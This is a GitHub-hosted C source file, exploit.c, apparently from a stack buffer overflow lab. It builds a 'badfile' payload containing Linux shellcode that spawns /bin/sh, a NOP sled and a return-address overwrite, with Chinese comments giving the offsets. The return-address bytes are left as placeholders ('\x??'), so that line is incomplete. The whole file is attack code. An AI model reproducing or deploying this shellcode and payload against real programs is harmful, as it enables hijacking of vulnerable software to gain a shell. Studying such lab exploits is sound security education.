-
Notifications
You must be signed in to change notification settings - Fork 3
/
exploit.c
42 lines (37 loc) · 1.24 KB
/
exploit.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
/* exploit.c */
/* A program that creates a file containing code for launching shell */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[] =
"\x31\xc0" // xorl %eax,%eax
"\x50" // pushl %eax
"\x68"
"//sh" // pushl $0x68732f2f
"\x68"
"/bin" // pushl $0x6e69622f
"\x89\xe3" // movl %esp,%ebx
"\x50" // pushl %eax
"\x53" // pushl %ebx
"\x89\xe1" // movl %esp,%ecx
"\x99" // cdq
"\xb0\x0b" // movb $0x0b,%al
"\xcd\x80" // int $0x80
;
void main(int argc, char **argv) {
char buffer[517];
FILE *badfile;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, 517);
/* You need to fill the buffer with appropriate contents here */
strcpy(
buffer,
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x??\x??\x??\x??"); //在buffer特定偏移处起始的四个字节覆盖shellcode地址
strcpy(buffer + 100,
shellcode); //将shellcode拷贝至buffer,偏移量设为了100
/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
}